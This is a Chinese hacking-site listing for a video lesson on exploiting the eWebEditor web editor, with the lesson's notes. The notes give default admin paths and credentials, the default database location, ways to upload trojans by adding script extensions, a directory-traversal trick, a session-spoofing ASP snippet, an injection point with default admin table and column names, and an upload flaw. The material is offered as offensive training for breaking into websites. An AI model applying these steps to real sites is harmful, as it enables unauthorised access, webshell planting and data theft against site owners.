| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 搜索 | 知识库 | 黑客点睛 | 手机 | 
服务导航 我要发布 主力频道 空间域名 精华收集 服务器出租 安全服务 主机托管 特色服务 解决方案 我要投诉
您现在的位置: 华盟网 >> 动画 >> 脚本入侵 >> 动画信息 用户登录 新用户注册


黑客动画 黑客视频
资讯文章 黑客下载

第3课网站编辑器eWebEditor漏洞利用 我要发布动画
文件大小:60300 K
动画性质:Win9x/NT/2000/XP/2003
动画作者:暗月式
类型格式:录像专家
责任编辑:朱倩
下载次数总计:
添加时间:2015/10/29
解压密码:www.77169.org 或  www.77169.com

 网站编辑器eWebEditor漏洞利用

作者:暗月式

在线编辑器应用广泛

查找的方法

利用工具对网站进行扫描

或者其他方式 例如网页连接处

1 常规入侵
默认后台

ewebeditor/admin_login.asp

默认密码

admin admin888

2默认数据库

db/ewebeditor.mdb

有时候可能修改成 asp 或者是asa

进了后台就要上传木马

添加aaspsp 或者asa cer aspx php

2 没有找到后台就要分析数据库

用明小子打开

3看style(样式哪里)如何有asp aaspsp asa

那么我们就要构造语句
ID=45&style=s_exampleremote

ewebeditor.asp?ID=45&style=s_exampleremote

4 ewebeditor遍历路径漏洞

上传文件管理---选择样式目录(随便选一个目录)
得到:
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=../../../.. 看到整个网站文件了

5 eWebEditor session欺骗漏洞

保存为asp格式上传到网站
<%Session("eWebEditor_User") = "11111111"%>
然后访问网页 再来访问Admin_Default.asp
 方法比较鸡肋

6 eweb2.7版本以下一个注入
eWebEditor.asp?id=14&style=standard
http://127.0.0.1/eWebEdito216/eWebEditor.asp?id=14&style=standard
eweb默认的管理员表是:ewebeditor_system
这个表下的默认两个列名为:sys_UserName和sys_userpass

7 ewebeditor asp版 2.1.6 上传漏洞

解压密码:www.77169.org

http://yunpan.cn/cKMKEn8VwTuBz (提取码:8adf)

下载地址1
 华盟提醒
(只显示最新5条。评论内容 只代表网友观点,与本站立场无关!)
姓 名:
* 游客填写  ·注册用户
主 页:
评 分:
1分 2分 3分 4分 5分
评论内容:
验证码: *
  • 请遵守《互联网 电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。
  • 严禁发表危害国家安全、损害国家利 益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容 的评论 。
  • 用户需对自己在使用本站服务过程中 的行为承担法律责任(直接或间接导致的)。
  • 本站管理员有权保留或删除评论内容 。
  • 评论内容只代表网友个人观点,与本网 站立场无关。
  • 最新推荐资讯
    最新推荐视频
    最新推荐软件

    Copyright @ 2013 77169.COM Inc. All rights reserved. 华盟网 版权所有 华安普特提供网络带宽